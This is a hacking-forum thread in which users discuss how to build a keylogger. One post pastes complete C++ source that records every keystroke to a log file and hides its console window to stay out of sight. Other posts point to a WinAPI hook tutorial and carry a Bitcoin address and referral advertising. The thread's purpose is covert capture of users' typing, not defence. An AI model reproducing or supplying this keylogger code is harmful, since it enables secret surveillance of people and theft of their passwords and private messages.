Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


Need to create a Keylogger filter_list
Author
Message
RE: Need to create a Keylogger #11
I decided to go with JAVA for IP monitor
I use Turbo pascal but it has some problems using crt ... need to fix it.
And thanx for your help ... i'll soon contact you with progress
Smile
[Image: cooltext980231940.gif]

Reply

RE: Need to create a Keylogger #12
keylogger on visual basic what any keylogger do not installWink

Reply

RE: Need to create a Keylogger #13
(05-02-2013, 12:37 PM)darkkill3rs Wrote: keylogger on visual basic what any keylogger do not installWink

Can you please elaborate your post? I am not able to understand what you are saying... Darkkill3rs Biggrin
[Image: cooltext980231940.gif]

Reply

RE: Need to create a Keylogger #14
You will have to learn c or c++ and learn how to hook using the winAPI =D

http://www.mpgh.net/forum/31-c-c-program...ook-c.html

Did find this does look good :lol:
Know PHP - HTML 5 - CSS3

Learning C

Hello there, [username] Need Help PM me now!


Please Visit my friends and I website : Creative Programming


[Image: LGqjaYA.gif]

Reply

RE: Need to create a Keylogger #15
You will have to learn c or c++ and learn how to hook using the winAPI =D

http://www.mpgh.net/forum/31-c-c-program...ook-c.html

Did find this does look good :lol:
Know PHP - HTML 5 - CSS3

Learning C

Hello there, [username] Need Help PM me now!


Please Visit my friends and I website : Creative Programming


[Image: LGqjaYA.gif]

Reply

RE: Need to create a Keylogger #16
How about this (C++) ?

Code:
#include <iostream> using namespace std; #include <windows.h> #include <winuser.h> int Save (int key_stroke, char *file); void Stealth(); int main() { Stealth(); char i; char saveto[250]; ExpandEnvironmentStrings("log.txt",saveto,250); while (1) { for(i = 8; i <= 190; i++) { if (GetAsyncKeyState(i) == -32767) Save (i,saveto); } } system ("pause"); return 0; } int Save (int key_stroke, char *file) { if ( (key_stroke == 1) || (key_stroke == 2) ) return 0; FILE *OUTPUT_FILE; OUTPUT_FILE = fopen(file, "a+"); cout << key_stroke << endl; if (key_stroke == 8) fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]"); else if (key_stroke == 13) fprintf(OUTPUT_FILE, "%s", "\n"); else if (key_stroke == 32) fprintf(OUTPUT_FILE, "%s", " "); else if (key_stroke == VK_TAB) fprintf(OUTPUT_FILE, "%s", "[TAB]"); else if (key_stroke == VK_SHIFT) fprintf(OUTPUT_FILE, "%s", "[SHIFT]"); else if (key_stroke == VK_CONTROL) fprintf(OUTPUT_FILE, "%s", "[CONTROL]"); else if (key_stroke == VK_ESCAPE) fprintf(OUTPUT_FILE, "%s", "[ESCAPE]"); else if (key_stroke == VK_END) fprintf(OUTPUT_FILE, "%s", "[END]"); else if (key_stroke == VK_HOME) fprintf(OUTPUT_FILE, "%s", "[HOME]"); else if (key_stroke == VK_LEFT) fprintf(OUTPUT_FILE, "%s", "[LEFT]"); else if (key_stroke == VK_UP) fprintf(OUTPUT_FILE, "%s", "[UP]"); else if (key_stroke == VK_RIGHT) fprintf(OUTPUT_FILE, "%s", "[RIGHT]"); else if (key_stroke == VK_DOWN) fprintf(OUTPUT_FILE, "%s", "[DOWN]"); else if (key_stroke == 190 || key_stroke == 110) fprintf(OUTPUT_FILE, "%s", "."); else fprintf(OUTPUT_FILE, "%s", &key_stroke); fclose (OUTPUT_FILE); return 0; } void Stealth() { HWND Stealth; AllocConsole(); Stealth = FindWindowA("ConsoleWindowClass", NULL); ShowWindow(Stealth,0); }

I didn't code this, or at least not the main part of it. It saves all keystrokes in log.txt.
My Bitcoin address: 1AtxVsSSG2Z8JfjNy9KNFDUN6haeKr7LiP
Give me money by visiting www.google.com here: http://coin-ads.com/6Ol83U

If you want a Bitcoin URL shortener/advertiser, please, use this referral: http://coin-ads.com/register.php?refid=noize

Reply